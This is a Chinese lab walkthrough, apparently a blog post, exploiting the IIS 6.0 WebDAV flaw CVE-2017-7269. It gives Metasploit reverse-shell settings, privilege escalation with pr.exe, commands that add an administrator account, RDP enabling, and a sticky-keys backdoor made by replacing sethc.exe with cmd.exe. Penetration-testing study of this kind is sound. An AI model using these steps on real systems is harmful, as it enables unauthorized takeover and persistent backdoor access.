iis6.0远程代码执行(CVE-2017-7269)
Windows Server 2003的IIS6.0的WebDAV服务的ScStoragePathFromUrl函数存在缓存区溢出漏洞
修复:
关闭IIS 下的WebDAV服务
2015年7月15日,微软已停止对Windows Server 2003的支持,所以官方没有相关解决方案,建议用户升级到最新系统 Windows Server 2016。
环境搭建
使用windows server 2003 R2
下载安装iis,这里我没有挂载光盘,网上下的iis安装包(已经安装好了,放个图)
这里我加了个默认页面
配置iis服务
测试环境准备就绪
window server 2003(靶机):192.168.162.132
kali(攻击机):192.168.162.128
EXP利用
下载
把exp 复制到kali攻击机器的/usr/share/metasploit-framework/modules/exploits/windows/iis目录下
打开Metasploit,使用我们刚才下载的exp
设置
msf exploit(windows/iis/cve-2017-7269) > set RHOST 192.168.162.132 #目标机ip
RHOST => 192.168.162.132
msf exploit(windows/iis/cve-2017-7269) > set HttpHost 192.168.162.132 #目标网站
HttpHost => 192.168.162.132
msf exploit(windows/iis/cve-2017-7269) > set payload windows/meterpreter/reverse_tcp #返回荷载
payload => windows/meterpreter/reverse_tcp
msf exploit(windows/iis/cve-2017-7269) > set LHOST 192.168.162.128 #攻击机IP
LHOST => 192.168.162.128
msf exploit(windows/iis/cve-2017-7269) >
攻击后返回meterpreter(附:相关命令)
提权
当前权限:
无法执行添加用户等命令
尝试上传asp木马到wwwroot目录(权限不足)
思考其他方法
尝试窃取管理员身份验证
在meterpreter使用ps命令查看目标主机进程
未发现发现存在以system运行的进程,尴尬了
发现部分目录可以上传,上传pr.exe提权工具
使用pr.exe执行命令
在添加用户时遇到问题,最后找到原因是win2003密码策略的原因,解决方案
解决后添加administrators用户
pr.exe "net user test123 test123 /add"
pr.exe "net localgroup administrators test123 /add"
netstat -an查看当前开放端口及服务(未拿到shell的话nmap扫也可以)
当前机器未开放3389远程桌面服务
上传3389开启工具
执行
netstat -an查看,成功开启
这时我们就可以用我们创建的test123用户远程连接到这台服务器上了
预留shift后门
sethc.exe存在于
c:\windows\system32\sethc.exe或c:\windows\system32\dllcache\sethc.exe
根据当前win2003环境sethc.exe存在的路径
copy c:\windows\system32\cmd.exe c:\windows\system32\dllcache\sethc.exe
这里我就简单的使用cmd.exe替换sethc.exe,有空的话自己写一个启动方式
这个后门返回的shell权限还是system,尝试nt authority\network service修改sethc.exe,竟然也成功了,所以当目标主机开启了3389,直接用shift后门体全部就可以。
1909
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
